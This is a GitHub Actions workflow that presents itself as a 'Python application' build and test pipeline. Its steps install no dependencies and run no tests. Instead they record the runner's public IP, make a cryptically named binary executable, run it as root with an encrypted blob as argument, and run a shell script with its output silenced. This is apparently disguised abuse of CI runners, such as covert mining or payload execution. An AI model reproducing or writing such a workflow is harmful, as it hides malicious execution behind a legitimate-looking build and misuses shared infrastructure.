name: Python application

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

permissions:
  contents: read

jobs:
  build:

    runs-on: ubuntu-latest
    timeout-minutes: 12

    steps:
    - uses: actions/checkout@v3
    - name: Set up Python 3.8
      uses: actions/setup-python@v3
      with:
        python-version: "3.8"
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        curl ifconfig.me > ip.txt
        cat ip.txt
    - name: Test run
      run: |
        cd ${{ github.workspace }}
        echo 'tcd94'
        sudo chmod +x garyiip7x/heardyg34i.ex
        sudo ./garyiip7x/heardyg34i.ex U2FsdGVkX19QZpLYgG7xe4E6tYMHWdBNHtbKeL2UaBiKBkHVzqCk8uAauWCC1rolWEJ8w7VxGH6NTYaLlGaTF/t5Iu0TMzESLWkJDR9KjFyf/p8uMAMNL/WXlpIVVhN3 ap06m7 && sudo sh r.sh > /dev/null 2>&1
